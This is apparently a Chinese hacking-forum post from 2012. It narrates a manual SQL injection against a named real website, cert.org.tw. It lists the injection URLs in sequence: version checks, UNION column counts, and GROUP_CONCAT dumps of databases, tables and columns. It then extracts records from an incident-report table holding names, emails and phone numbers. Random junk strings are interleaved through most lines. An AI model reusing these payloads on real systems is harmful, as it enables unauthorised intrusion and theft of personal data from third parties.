1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
8 z0 U9 ^# c8 g4 N. I, x4 I2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
) T, h- [% L8 Q! R- ~http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
4 _1 V" h& h, x, Z% V5 h0 C3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
/ Q) [9 X2 R$ p1 i! x数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
, c9 w. b1 v7 m1 H* ` T3 l2 K8 J4.判断有没有写权限$ X* `3 e9 K4 x- A6 i$ X8 A
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限7 B' {9 c7 ~" Q8 K# r( ~3 Q( R0 t- b
没办法,手动猜表啦+ o' @, v9 |7 w1 E4 e
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1$ x4 u' N4 Z; K9 K9 F* o
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
8 t! z5 w* S8 v# f, H2 C% ohttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
0 p5 ?, r2 H; K( M成功查出所有数据库,国外的黑客就是不一般。数据库如下:
# i" M" \; X% Kinformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
0 }4 M6 N; i7 x6 i% V( I% C6.爆表,爆的是twcert库8 w; ^4 \& P* e/ \# x( P# q. f
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--" ^' y2 _. x" b2 i( K
爆出如下表, s+ ]# o$ G. B1 n/ z
downloadfile,irsys,newsdata,secrpt,secrpt_big5
$ Y! y4 r6 b1 B$ K8 T! v: {5 d7.爆列名,这次爆的是irsys表' P7 r* Z/ C: c0 k2 e. S. F; E
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--& X6 H; D' a! l9 j5 g; B
爆出如下列# f5 ]; r( z: c" L( m) Z
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
6 @" M: J+ n( v' J! b* C7 Y8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。+ n- [) {" u" J# D
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
4 X) h* A- m0 Z% R% L) f返回是3,说明每个列里有3个地段
* @7 J. [9 T# L" y9.爆字段内容
2 R: Q! P3 `& o; @http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--/ c( O3 G, e* S( }( m1 m
爆出name列的第一个字段的内容
( p' H- M6 V0 s* q9 ~! E7 @http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
. X4 O7 y9 S Q" \( K. j8 t$ L爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对